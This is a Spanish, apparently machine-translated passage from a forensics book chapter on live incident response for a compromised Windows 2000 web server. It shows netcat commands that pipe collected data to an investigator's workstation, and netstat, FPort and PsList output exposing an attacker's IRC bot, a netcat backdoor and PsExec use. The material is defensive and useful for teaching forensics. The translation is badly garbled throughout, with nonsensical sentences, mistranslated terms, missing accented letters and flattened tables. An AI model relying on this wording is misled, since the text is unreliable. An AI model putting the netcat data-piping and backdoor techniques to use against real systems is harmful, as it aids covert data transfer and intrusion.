RESPUESTA A INCIDENTES

En este libro, un equipo de clase mundial seis expertos en informtica forense, muy realista investigaciones y proporciona un DVD con todos los datos que necesita para seguir a lo largo y en la prctica. Como se discuti en el captulo 1, a veces su vctima no puede permitirse el lujo de eliminar el sistema o la nica prueba del incidente puede ser objeto, actualmente, en la memoria. De cualquier manera, una norma de la duplicacin forense es imposible. En este captulo se abordar una tcnica para la recogida y el anlisis forense de las pruebas de sonido lo que se conoce como el Live Proceso de Respuesta a Incidentes. Captulo 1: Respuesta de Windows Live para la recogida y el anlisis de evidencia forense de sonido Cuando una mquina de Microsoft Windows est involucrado en un incidente, tenemos varias opciones de cmo proceder a realizar una investigacin. El escenario se realiza siguiendo los siguientes pasos que un investigador toma. Algunas veces su vctima no puede permitirse el lujo de eliminar el sistema de la red debido a un buen servidor de copia de seguridad no puede ser intercambiada en su lugar. Por lo tanto, no se puede adquirir una duplicacin forense tradicional. Otras veces, los datos actualmente en la memoria puede ser la nica prueba del incidente. En este captulo se abordar una tcnica para la recogida y el anlisis forense de las pruebas de sonido lo que se conoce como el Live Proceso de Respuesta a Incidentes. En resumen, una respuesta en vivo recopila todos los datos pertinentes del sistema que se utilizar para confirmar si se produjo un incidente. Los datos recogidos durante una respuesta en vivo consta de dos subgrupos principales: voltil y no voltil de datos. La volatilidad de los datos es la informacin que se perdera si vamos hasta una mquina y extraemos el cable de alimentacin. Estos datos no se presente, si tuviramos que depender de los tradicionales mtodos de anlisis forense de las duplicaciones. Un proceso de respuesta en vivo contiene informacin tal como las actuales conexiones de red, procesos que se estn ejecutando, y los archivos abiertos. Por otro lado, la no voltil de datos que recogemos en vivo durante la respuesta es la informacin que sera "bueno

tener". Queremos recoger no voltil de datos tales como el sistema de registros de sucesos en un formato de fcil lectura, por ejemplo, en lugar de la materia prima de archivos binarios en los que Microsoft Windows guarda. Por supuesto, estos datos que existen en una duplicacin forense, pero sera ms difcil la salida en un formato agradable despus de la mquina se ha apagado. La respuesta vivir la recogida de datos ejecutando una serie de comandos. Cada comando de datos que produce, en circunstancias normales, seran enviados a la consola. Porque tenemos que guardar los datos para su posterior anlisis, queremos transmitir los datos a nuestro forense de trabajo (una mquina que el investigador forense considera de confianza) en lugar de la vctima local del disco duro. Si tuviramos que guardar los datos a nivel local a la vctima de la unidad de disco duro, habr una importante oportunidad que se sobrescriba pruebas si optamos por adquirir una duplicacin forense en una fecha posterior. Por lo tanto, este efecto es indeseable. Hay dos principales maneras en que podemos transmitir los datos al trabajo forense. La primera manera es usar la "navaja suiza" de los administradores de red llamado netcat. netcat simplemente crea canales de TCP. netcat se pueden ejecutar en un modo de escucha, como un servidor de telnet, o en un modo de conexin, al igual que el cliente telnet. Podemos empezar un netcat en nuestro servidor de trabajo forense con el siguiente comando:
nc v l p 2222 > command.txt

El modificador-v lugares netcat en modo detallado. El interruptor-l lugares netcat en modo de escucha (como un servidor de telnet). -P le dice a netcat en la que el puerto TCP para escuchar de datos. Al utilizar este comando, cualquier dato enviado al puerto TCP 2222 en nuestro trabajo forense se guardar en command.txt. El ordenador de la vctima, tendr que ejecutar un comando para recoger datos de la respuesta en vivo. La salida del comando se enva ms de nuestro canal TCP en el puerto 2222 y guardado en el lugar de trabajo forense de la vctima del disco duro. Los datos se pueden enviar desde el ordenador vctima con el siguiente comando:
command | nc forensic_workstation_ip_address 2222

Por supuesto, usted desea cambiar el nombre de la cursiva palabras clave como comando con el comando que ejecuta para recoger los datos de la respuesta en vivo. Los comandos ms relevantes que conforman nuestra vivo Proceso de Respuesta a Incidentes se debatir en breve. Adems, tendr que sustituir la direccin IP de su trabajo forense donde dice forensic_workstation_ip_address. Despus de estos comandos han finalizado, el sistema le presione CTRL-C (^ C) para romper el netcat perodo de sesiones, y el archivo resultante command.txt contendr todos los datos de los comandos que hemos ejecutado. Una simple suma de control MD5 de command.txt se puede calcular de modo que usted puede demostrar su autenticidad en una fecha posterior con el siguiente comando:
md5sum b command.txt > command.md5

..
vamos a analizar los datos adquiridos durante la "JBR del Banco de intrusos" vivir respuesta escenario que usted puede hacer referencia al principio de este libro ANALISIS DE DATOS VOLATILES

Cuando hemos elegido para ejecutar una respuesta en directo en una vctima del sistema, el servidor web llamado JBRWWW en nuestro escenario actual, la mayora de los importantes datos que adquirida en los datos voltiles. La volatilidad de los datos de un ordenador vitima suele contener informacin importante que nos ayuda a determinar el "quin", "cmo", y, posiblemente, "por qu" del incidente. Para ayudar a responder estas preguntas, que los datos recopilados a partir de las siguientes reas en la mquina vctima: El sistema de fecha y hora Actuales conexiones de red Abrir TCP o UDP Ejecutables que se estn abriendo TCP o UDP Cach de nombres NetBIOS de escritorio sesiones de usuario abriertas La tabla de enrutamiento interior Procesos que se estn ejecutando Servicios en ejecusion Tareas programadas archivos abriertos Proceso de volcados de memoria Vamos a abordar cada una de estas reas vitales en sus respectivas secciones y analizar los datos que adquirida a partir de JBRWWW.

FECHA Y HORA DEL SISTEMA Este es probablemente el ms fcil de informacin para recopilar y entender, sin embargo, es una de las ms importantes piezas de informacin para el investigador y es de fcil perderse. Sin la fecha y hora actuales, sera difcil para correlacionar la informacin entre la vctima mltiples mquinas si las mquinas se vieron afectadas. Aunque en nuestro escenario que estamos examinando un sistema nico, su intrusiones puede implicar decenas o cientos de sistemas. Mantener el sistema de tiempo y observando el desplazamiento de una fuente de confianza (tales como un servidor NTP) es primordial la hora de examinar los archivos de registro de tiempo o de otro tipo basadas en pruebas a partir de mltiples servidores. La hora y la fecha son simplemente recogidos por la expedicin de la hora y la fecha de comandos en el smbolo del sistema. La hora y la fecha de JBRWWW se consideraron como sigue: La fecha actual es: Mircoles 10/01/2003 La hora actual es: 21:58:19.29 Esto es, en efecto, el momento en que empez a vivir nuestra respuesta en JBRWWW. ESTE ES EL FORMATO DE HORA YA QUE SE RECOLEVCTO LA INFORMACION EN LA COSTA ESTE DE LOS ESTADOS UNIDOS. ACTUALES CONEXIONES DE RED Es totalmente posible que podra ser la ejecucin de nuestro proceso de respuesta en vivo, mientras que el atacante se conecta al servidor. Tambin podra ser posible que el atacante se est ejecutando un mecanismo de fuerza bruta contra otras mquinas en Internet de este servidor. Escenarios similares a los mencion anteriormente que sera detectado si examinamos los actuales conexiones de red. Consideramos que una mquina de conexiones de red mediante la emisin de los comando netstat. En concreto, tenemos que especificar las banderas con un netstat para recuperar la totalidad de las conexiones de red y ver la materia prima de las direcciones IP en lugar de los nombres de dominio completos (FQDN):
netstat an
When we executed the netstat command on JBRWWW, we received the following information:

Active Connections

Proto Local Address TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0.0.0:7 0.0.0.0:9 0.0.0.0:13 0.0.0.0:17 0.0.0.0:19 0.0.0.0:21 0.0.0.0:25 0.0.0.0:80 0.0.0.0:135 0.0.0.0:443 0.0.0.0:445 0.0.0.0:515 0.0.0.0:1025 0.0.0.0:1027 0.0.0.0:1030 0.0.0.0:1031 0.0.0.0:1033 0.0.0.0:1174 0.0.0.0:1465 0.0.0.0:1801 0.0.0.0:3372 0.0.0.0:4151 0.0.0.0:60906 103.98.91.41:139 103.98.91.41:445 103.98.91.41:1033 103.98.91.41:1174 103.98.91.41:1465 103.98.91.41:3992

Foreign Address 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 95.208.123.64:3762 95.208.123.64:21 95.145.128.17:6667 95.208.123.64:3753 95.208.123.64:445

State LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING ESTABLISHED CLOSE_WAIT ESTABLISHED ESTABLISHED TIME_WAIT

TCP TCP TCP TCP TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP

103.98.91.41:4151 103.98.91.41:60906 127.0.0.1:1029 127.0.0.1:2103 127.0.0.1:2105 127.0.0.1:2107 127.0.0.1:4150 0.0.0.0:7 0.0.0.0:9 0.0.0.0:13 0.0.0.0:17 0.0.0.0:19 0.0.0.0:135 0.0.0.0:161 0.0.0.0:162 0.0.0.0:445 0.0.0.0:1026 0.0.0.0:1028 0.0.0.0:1032 0.0.0.0:3456 0.0.0.0:3527 103.98.91.41:137 103.98.91.41:138 103.98.91.41:500 103.98.91.41:520

103.98.91.200:2222 95.16.3.23:1048 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:* *:*

ESTABLISHED ESTABLISHED LISTENING LISTENING LISTENING LISTENING LISTENING

La negrita representan las lneas de las conexiones de red activas. Las lneas adicionales (que no estn en negritas) son los puertos abiertos, que vamos a abordar en la prxima seccin. Porque sabemos que nuestro trabajo forense se encuentra en la direccin IP 103.98.91.200, podemos hacer caso omiso de las conexiones correspondientes. Una conexin TCP en el puerto 2222 se esperaba debido al proceso de transferencia de datos hemos hablado anteriormente en este captulo con netcat. Despus de la eliminacin de todos los

dems datos extraos, nos deja con seis lneas interesantes:

Proto Local Address TCP TCP TCP TCP TCP TCP 103.98.91.41:445 103.98.91.41:1033 103.98.91.41:1174 103.98.91.41:1465 103.98.91.41:3992 103.98.91.41:60906 Foreign Address 95.208.123.64:3762 95.208.123.64:21 95.145.128.17:6667 95.208.123.64:3753 95.208.123.64:445 95.16.3.23:1048 State ESTABLISHED CLOSE_WAIT ESTABLISHED ESTABLISHED TIME_WAIT ESTABLISHED

La primera lnea es una conexin a JBRWWW de Windows 2000 NetBIOS puerto. Por lo tanto, la direccin IP 95.208.123.64 podra ser la emisin de comandos con una herramienta como psexec, la conexin a un recurso compartido de archivos con el comando net use, o la explotacin de algunas otras funcionalidades de Microsoft Windows. La segunda lnea es muy interesante. Se conecta JBRWWW al puerto 21, el puerto FTP, el sistema de 95.208.123.64. Debido a que el administrador jura que no ha participado en este sentido, esta lnea de bandera como actividad sospechosa. La tercera lnea es una conexin a un servidor IRC (el puerto TCP 6667) en 95.145.128.17. Este es otro sentido, el administrador no participar en, y tomamos nota de que como tal. La cuarta lnea no es familiar para nosotros. Una rpida bsqueda en http://www.portsdb.org demuestra que puede ser el "nattyserver" o "ChilliASP" servicio. Debido a que esta informacin no suena una campana, que este pabelln como "posiblemente sospechosas" y seguir adelante. La quinta lnea de detalles una conexin NetBIOS de nuestra mquina vctima, de vuelta a 95.208.123.64. Esto podra indicar que el atacante ha emitido un comando net use el mapa JBRWWW a una parte de su mquina de atacar a la mquina vctima. Debido a esta direccin IP se presentaron ms de una vez en la categora de actividad sospechosa, tambin este respecto bandera como sospechosas. La ltima lnea muestra una conexin con JBRWWW del puerto TCP 60906. 1.024 por encima de los puertos suelen ser los puertos efmeros. Observe que tambin se conecta a un puerto efmero en una diferente direccin IP de destino en 95.16.3.23. Un ojo inexperto puede haber superado esta lnea por ahora, pero aadimos a nuestra posible actividad sospechosa categora.

PUERTOS TCP O UDP ABIERTOS Si volvemos a la larga lista netcat demostrado anteriormente, todas las lneas que no estn en negritas son los puertos abiertos. Estamos interesados en estas lneas por una razn: un puerto abrierto negado, ejecuta una puerta trasera en la maquina victima. Ahora, nos damos cuenta de que Windows abre un montn de puertos legtimos en el curso de hacer su negocio, pero podemos maleza muchos de ellos rpidamente. Las primeras lneas a travs de puerto TCP 515 son normales los puertos de Windows, por lo general, cuando comenz a IIS y simple de TCP / IP los servicios estn instalados en la mquina. El prximo puertos TCP, hasta el establecido conexiones porcin de la produccin, son los puertos efmeros:
Proto Local Address TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP 0.0.0.0:1025 0.0.0.0:1027 0.0.0.0:1030 0.0.0.0:1031 0.0.0.0:1033 0.0.0.0:1174 0.0.0.0:1465 0.0.0.0:1801 0.0.0.0:3372 0.0.0.0:4151 0.0.0.0:60906 Foreign Address 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 State LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING

Vemos que hay un montn de puertos abiertos que no podemos identificar. Un atacante podra abrirlo por medio de una puerta trasera. Con netstat solos, no podemos identificar el propsito de los puertos abiertos, por lo que tenemos que ver que los ejecutables abierto los puertos para tener una mejor idea de sus efectos.

PUERTOS TCP/UDP ABIERTOS Para examinar la extraa que los puertos estn abiertos en este equipo, tenemos que vincular los puertos abiertos a los ejecutables que les abri. No es una herramienta que hace este llamado FPort, distribuido libremente en http://www.foundstone.com. FPort no necesita adicionales de lnea de comandos para ejecutar los argumentos que viven en nuestra respuesta. Despus de ejecutado FPort, hemos recibido los siguientes resultados:
FPort v1.31 - TCP/IP Process to Port Mapper Copyright 2000 by Foundstone, Inc. http://www.foundstone.com Securing the dot com world Pid Process Port Proto Path 1292 tcpsvcs 1292 tcpsvcs 1292 tcpsvcs 1292 tcpsvcs 1292 tcpsvcs 1044 inetinfo 1044 inetinfo 1044 inetinfo 380 8 svchost System -> 7 -> 9 -> 13 -> 17 -> 19 -> 21 -> 25 -> 80 -> 135 -> 139 -> 443 -> 445 -> 515 -> 1025 -> 1027 -> 1029 -> 1030 -> 1031 -> 1033 TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\system32\ftp.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\system32\MSTask.exe C:\WINNT\System32\msdtc.exe C:\WINNT\System32\mqsvc.exe C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\system32\svchost.exe

1044 inetinfo 8 System

1292 tcpsvcs 492 784 860 8 MSTask msdtc mqsvc System

1044 inetinfo 1372 ftp

1224 iroffer 1224 iroffer 860 860 860 860 784 mqsvc mqsvc mqsvc mqsvc msdtc

-> 1174 -> 1465 -> 1801 -> 2103 -> 2105 -> 2107 -> 3372 -> 4151 -> 4153

TCP TCP TCP TCP TCP TCP TCP TCP TCP

C:\WINNT\system32\os2\dll\iroffer.exe C:\WINNT\system32\os2\dll\iroffer.exe C:\WINNT\System32\mqsvc.exe C:\WINNT\System32\mqsvc.exe C:\WINNT\System32\mqsvc.exe C:\WINNT\System32\mqsvc.exe C:\WINNT\System32\msdtc.exe D:\win_2k\intel\bin\t_NC.EXE C:\WINNT\system32\os2\dll\iroffer.exe C:\WINNT\system32\os2\dll\nc.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\System32\tcpsvcs.exe C:\WINNT\system32\svchost.exe

1348 t_NC 1224 iroffer 1424 nc 1292 tcpsvcs 1292 tcpsvcs 1292 tcpsvcs 1292 tcpsvcs 1292 tcpsvcs 380 8 8 svchost System System

-> 60906 TCP -> 7 -> 9 -> 13 -> 17 -> 19 -> 135 -> 137 -> 138 -> 161 -> 162 -> 445 -> 500 -> 520 -> 1026 -> 1028 -> 1032 -> 3456 -> 3527 UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP

1244 snmp 1256 snmptrap 8 224 440 212 860 System lsass svchost services mqsvc

C:\WINNT\System32\snmp.exe C:\WINNT\System32\snmptrap.exe

C:\WINNT\system32\lsass.exe C:\WINNT\System32\svchost.exe C:\WINNT\system32\services.exe C:\WINNT\System32\mqsvc.exe C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\System32\inetsrv\inetinfo.exe C:\WINNT\System32\mqsvc.exe

1044 inetinfo 1044 inetinfo 860 mqsvc

Los puertos identificados a partir de la ltima seccin se muestra en negrita en este texto. Los primeros cinco lneas ms probable es que puede ser atribuido a la apertura de archivos binarios del sistema los puertos TCP 1025, 1027,

1029, 1030 y 1031. La siguiente lnea muestra que alguien se ejecuta el cliente FTP nativo en JBRWWW. Debido a que el administrador dice que no se ejecuta el cliente FTP, que este comportamiento bandera como actividad sospechosa. Las siguientes dos lneas de detalle ejecutando un ejecutable en C: \ winnt \ system32 \ OS2 \ dll que se denomina iroffer.exe:
Pid Process Port Proto Path -> 1174 TCP -> 1465 TCP C:\WINNT\system32\os2\dll\iroffer.exe C:\WINNT\system32\os2\dll\iroffer.exe

1224 iroffer 1224 iroffer

Inmediatamente esta informacin parece sospechoso porque no son conscientes de OS/2-related cualquier DLL que se abren puertos de red. Una rpida bsqueda en http://www.google.com de "iroffer" se vuelve un sitio web en http://www.iroffer.org. Se trata de un sitio Web real, y la herramienta tiene fines legtimos. Aparentemente, esta herramienta es un robot que se conecta a canales de IRC y ofrece control remoto de JBRWWW! Por lo tanto, estas dos lneas de proporcionar la confirmacin de que hubo un incidente en el que JBRWWW. Los prximos cinco lneas en la salida FPort mostrar los puertos abiertos por el mqsvc.exe, un binario afiliados a la cola de mensajes de Windows. La siguiente lnea detecta vivir nuestra respuesta netcat perodo de sesiones:
Pid Process Port Proto Path -> 4151 TCP D:\win_2k\intel\bin\t_NC.EXE

1348 t_NC

Hemos cambiado el nombre de nuestro netcat binario en el CD-ROM a t_NC.EXE para simbolizar que era "de confianza". Tambin fue cambiado el nombre para que accidentalmente no se ejecute una copia de nc.exe de la mquina vctima. Ms informacin se presentar en vivo acerca de la respuesta carpetas en el Captulo 16. Si nos movemos a la siguiente dos lneas, nos damos cuenta de que ellos nos proporcionan la mayor parte de la informacin relativa a las puertas traseras del atacante:
Pid Process Port -> 4153 Proto Path TCP C:\WINNT\system32\os2\dll\iroffer.exe C:\WINNT\system32\os2\dll\nc.exe

1224 iroffer 1424 nc

-> 60906 TCP

Parece como si el atacante no slo ha iroffer en el sistema, pero un netcat perodo de sesiones. No podemos decir lo que el atacante est haciendo con el netcat perodo de sesiones slo con estas dos lneas. Podra ser una conexin de salida, o puede ser en modo de escucha, permitiendo las conexiones de entrada libre acceso a un shell de comandos. Al reexaminar la salida de netstat demostrado anteriormente, vemos que el puerto 60906 es escuchar activamente. Por lo tanto, podemos concluir a travs de netcat y FPort que el atacante de la puerta trasera en 60.906 en la actualidad la escucha de conexiones y est activamente conectado a un rogue direccin IP. Hemos descuidado a hablar de la UDP en la seccin anterior, por una buena razn. UDP se suele utilizar menos de TCP porque se trata de un aptrida de protocolo, por lo que los puertos UDP puede ser un familiar para usted. Una manera de determinar el abra los puertos UDP es comprobar http://www.portsdb.org junto con el anlisis de una manera similar configurado Windows 2000 Server con IIS y los servicios bsicos de Unix instalado. Por supuesto, esa es la manera difcil de hacerlo. Si se comparan los archivos ejecutables que se abren los puertos UDP con la legtimamente abierto los puertos TCP en JBRWWW, ver que se abren por sistema similar binarios. Por supuesto, para realmente asegurarse de que son archivos binarios del sistema, tenemos que comparar el MD5 checksum de estos archivos con un conocido, fuente de confianza, como Microsoft o mediante la comparacin de ellas a los ejemplares se encuentran en un servidor inflexible. TABLA DE NOMBRES NETBIOS Y SUS IP RESUELTAS Cuando examinamos el sistema de registros de sucesos ms adelante en este captulo, veremos que Windows (hasta versin 2003) de conexin especficos almacenados por el nombre NetBIOS en lugar de la direccin IP. Como un investigador, esto nos hace ningn bien. Un atacante puede fcilmente cambiar su nombre NetBIOS a "HACKER", hacer dao a su sistema y, a continuacin, volver a cambiarlo al valor original. Sus registros que tienen la palabra "hacker" como la conexin de la mquina. Porque queremos un mapa de nombres NetBIOS a una direccin IP a la infame acelerador individual, podemos emitir el comando nbtstat vivir durante nuestra respuesta a la vctima de volcado del sistema de cach de nombres NetBIOS. Por favor, tome nota de que este comando slo nos muestran el nombre NetBIOS cach de la tabla, no un historial completo de las conexiones. Por lo tanto, los valores en

este tabla representan las conexiones a las mquinas y de un relativamente corto perodo de tiempo atrs. Cuando ejecute el comando siguiente (el modificador-c nbtstat instruye vuelca la memoria cach):
nbtstat c

veremos los resultados:

Local Area Connection: Node IpAddress: [103.98.91.41] Scope Id: [] NetBIOS Remote Cache Name Table Name Type Host Address 95.208.123.64 <20> UNIQUE 95.208.123.64 562

Life [sec]

Esta es una nica respuesta! El "nombre" de este servidor es en realidad la misma que la direccin IP para este equipo situado en la 95.208.123.64. Por lo general, el nombre NetBIOS que aparecen en el "Nombre" la columna. Al examinar pruebas adicionales ms adelante en este captulo, la direccin IP actual se mostrar para este equipo, lo que har que nuestra vida mucho ms sencilla que tener que contar con los nombres NetBIOS. SESIONES ACTUALMENTE ABIERTAS Si usted desea ser cauteloso en vivo durante su respuesta, usted puede ejecutar PsLoggedOn, que es una herramienta distribuida dentro de la suite de PsTools http://www.sysinternals.com. Esta herramienta regreso a los usuarios que se registran actualmente en el sistema o acceder a los recursos de acciones. Al ejecutar esta herramienta en JBRWWW sin parmetros de lnea de comandos, recibimos la siguiente informacin:
PsLoggedOn v1.21 - Logon Session Displayer Copyright (C) 1999-2000 Mark Russinovich SysInternals - http://www.sysinternals.com Users logged on locally: 8/23/2003 3:32:53 PM JBRWWW\Administrator Users logged on via resource shares: 10/1/2003 9:52:26 PM (null)\ADMINISTRATOR

Hay un usuario conectado en el nivel local. El administrador local de acceso se atribuye a vivir nuestra respuesta porque tenemos que estar conectado con acceso de administrador para ejecutar nuestras herramientas. El segundo es tambin de acceso de administrador, pero es una conexin remota. Por lo tanto, alguien est accediendo a JBRWWW como estamos investigando el sistema. Observe que esta conexin tiene privilegios de administrador, que es un requisito previo para PsExec, otra herramienta dentro de la suite PsTool que vamos a discutir un poco ms adelante. Volvamos a nuestras actuales conexiones de red:
Proto TCP Local Address 103.98.91.41:445 Foreign Address 95.208.123.64:3762 State ESTABLISHED

Para un usuario que va a ser conectado a distancia, l o ella debe estar conectado a un puerto NetBIOS. Para Windows 2000, es el puerto TCP 445 o 139. Para las versiones anteriores de Windows, slo el puerto TCP 139. Por lo tanto, ahora sabemos el atacante de la direccin IP es 95.208.123.64. TABLA DE ENRUTAMIENTO INTERNA Uno de los nefastos usos de un servidor implica el atacante alterar la ruta de los cuadros para desviar el trfico de alguna manera. Una de las ventajas para el atacante de desvo de trfico es evitar un dispositivo de seguridad, tales como un firewall. Si hay un cortafuegos en la forma en que el atacante de la prxima vctima, que puede ser capaz de entrar en la red a travs de un router que tiene ms permisiva listas de control de acceso. Es posible que su servidor le puede permitir hacer esto. Otra razn para que un atacante puede alterar la tabla de rutas es redirigir el flujo de trfico a olfatear (captura) los datos de vuelo por sobre la conexin de red. Podemos examinar la tabla de enrutamiento mediante la emisin de los comando netstat con la RN-la lnea de comandos. Los siguientes datos provienen de los comando netstat cuando se ejecuta en JBRWWW:
================================================== ======================== Interfaz de Lista 0x1 ........................... MS TCP interfaz loopback 0x1000003 ... 00 c0 4F 1C 10 2B ...... 3Com EtherLink PCI ================================================== ========================= ==================================================

========================= Rutas activas: Red de destino, mscara de red Gateway Interface mtricas 0.0.0.0 0.0.0.0 103.98.91.1 103.98.91.41 1 103.98.91.0 255.255.255.0 103.98.91.41 103.98.91.41 1 103.98.91.41 255.255.255.255 127.0.0.1 127.0.0.1 1 103.255.255.255 255.255.255.255 103.98.91.41 103.98.91.41 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 224.0.0.0 224.0.0.0 103.98.91.41 103.98.91.41 1 255.255.255.255 255.255.255.255 103.98.91.41 103.98.91.41 1 Puerta de enlace predeterminada: 103.98.91.1 ================================================== ========================= Rutas persistentes: Ninguno Tabla de rutas Conexiones activas Proto Direccin local Direccin Estado de Relaciones Exteriores TCP 103.98.91.41:445 95.208.123.64:3762 ESTABLECIDO TCP 103.98.91.41:1033 95.208.123.64:21 CLOSE_WAMT TCP 103.98.91.41:1174 95.145.128.17:6667 ESTABLECIDO TCP 103.98.91.41:1465 95.208.123.64:3753 ESTABLECIDO TCP 103.98.91.41:3992 95.208.123.64:445 TIME_WAIT TCP 103.98.91.41:4151 103.98.91.200:2222 ESTABLECIDO TCP 103.98.91.41:60906 95.16.3.23:1048 ESTABLECIDO

La tabla de enrutamiento se ve como normal una tabla de enrutamiento para este servidor. Observe que este comando tambin listas abiertas las conexiones de red. La lista de abrir conexiones de red coincide exactamente con la versin que vimos anteriormente, cuando emiti el netstat-un comando. Procesos que se estn ejecutando En ltima instancia, nos gustara saber qu procesos el atacante se ejecuta en JBRWWW porque pueden contener puertas traseras o el atacante ms los esfuerzos de la vctima en la red. Podemos lista de la tabla de procesos con el pslist herramienta de la suite PsTools distribuidos de http://www.sysinternals.com. Ejecutora pslist sin banderas nos da la siguiente informacin:
PsList v1.2 - Proceso de Informacin Lister Copyright (C) 1999-2002 Marcos Russinovich Sysinternals - http://www.sysinternals.com Proceso de informacin para JBRWWW: Nombre pid Pri THD HND miembros de usuario ncleo tiempo tiempo tiempo transcurrido Inactivo 0 0 1 0 16 0:00:00.000 4:32:11.623 942:27:36.131 Sistema de 8 8 32 183 212 0:00:00.000 0:00:16.073 942:27:36.131 SMSs 140 11 6 33 344 0:00:00.010 0:00:00.470 942:27:36.131 csrss 164 13 14 449 1804 0:00:00.460 0:00:06.339 942:27:27.649 Winlogon 184 13 14 336 2920 0:00:00.721 0:00:02.513 942:27:26.067 servicios 212 9 32 532 5432 0:00:02.643 0:00:05.087 942:27:24.084 LSASS 224 9 14 276 1208 0:00:01.271 0:00:01.642 942:27:24.044 svchost 380 8 6 222 2464 0:00:02.994 0:00:04.135 942:27:20.108 SPOOLSV 408 8 10 98 2460 0:00:00.050 0:00:00.160 942:27:19.467 svchost 440 8 27 549 5784 0:00:00.510 0:00:00.771 942:27:19.347 regsvc 476 8 2 30 812 0:00:00.020 0:00:00.020 942:27:19.087 mstask 492 8 6 89 1772 0:00:00.040 0:00:00.040 942:27:18.786

Explorer 636 8 10 225 1180 0:00:01.972 0:00:05.417 942:25:26.054 msdtc 784 8 22 166 3312 0:00:00.440 0:00:00.180 942:20:24.901 mqsvc 860 8 22 180 3628 0:00:00.160 0:00:00.370 942:20:21.697 Inetinfo 1044 8 36 655 1071 2 0:00:08.352 0:00:05.327 942:17:39.914 snmptrap 1256 8 4 47 1148 0:00:00.010 0:00:00.020 942:16:44.374 tcpsvcs 1292 8 4 77 1444 0:00:00.010 0:00:00.100 942:16:39.958 snmp 1244 8 6 222 3132 0:00:00.050 0:00:00.160 942:13:39.358 cmd 556 8 1 24 1020 0:00:00.110 0:00:00.230 942:08:37.614 dllhost 888 8 11 135 3416 0:00:00.280 0:00:00.160 195:07:22.229 mdm 580 8 3 75 1928 0:00:00.030 0:00:00.030 195:07:21.047 dllhost 1376 8 23 229 4684 0:00:00.130 0:00:00.160 195:06:26.479 PSEXESVC 892 8 6 63 1008 0:00:00.010 0:00:00.030 2:41:47.564 cmd 1272 8 1 25 984 0:00:00.020 0:00:00.030 2:41:15.969 ftp 1372 8 1 39 1176 0:00:00.020 0:00:00.020 2:39:05.861 cmd 1160 8 1 28 976 0:00:00.020 0:00:00.010 2:24:25.536 nc 1424 8 3 40 1012 0:00:00.010 0:00:00.040 2:23:39.800 cmd 1092 8 1 34 968 0:00:00.010 0:00:00.020 2:22:03.992 iroffer 1224 8 5 95 2564 0:00:00.090 0:00:00.200 2:21:30.544 cmd 1468 8 1 30 984 0:00:00.030 0:00:00.030 2:00:02.272 cmd 496 8 1 24 964 0:00:00.020 0:00:00.090 0:00:00.841 T_NC 1348 8 1 28 1004 0:00:00.020 0:00:00.030 0:00:00.821 T_PSLIST 1484 8 2 87 1216 0:00:00.040 0:00:00.030 0:00:00.050

Tras el examen de estos datos, vemos que las primeras lneas a la seccin en negrita son los procesos del sistema por el largo tiempo transcurrido. Esto es indicativo de procesos que se ejecutan desde el inicio, que son tpicos los procesos del sistema. El atacante podra ejecutar tienen algo en el arranque, y habramos perdido por descremado el tiempo transcurrido, por lo que volvera a verificar este proceso lista inflexible contra un servidor para confirmar nuestra teora. A continuacin, la seccin muestra en negrita los procesos ejecutados por el atacante. Los procesos fueron ejecutados aproximadamente 2 horas y 40 minutos antes de que corra nuestra respuesta en vivo. Esta informacin nos da un marco de tiempo cuando el atacante estaba en JBRWWW. Debido a que la mquina fue arrancado hace mucho tiempo, su ataque inicial puede haber sido casi tres horas antes de nuestra respuesta. Si calculamos 2 horas y 40 minutos antes de nuestra respuesta se inici (recuerde la fecha y la hora de comandos?), Que fue 19:18 el 1 de octubre de 2003. Parece que el atacante corri PSEXECSVC, que es el resultado de un comando PsExec canal iniciado a JBRWWW. PsExec es una herramienta de http://www.sysinternals.com distribuido que permite a un usuario vlido para conectarse desde una mquina de Microsoft Windows a otro y ejecutar un comando a travs de una conexin NetBIOS. (Esto podra explicar las conexiones al puerto 445 que hemos descubierto en una seccin anterior). Atacantes utilizar esta herramienta para ejecutar cmd.exe normalmente. Sabiendo que el atacante se est 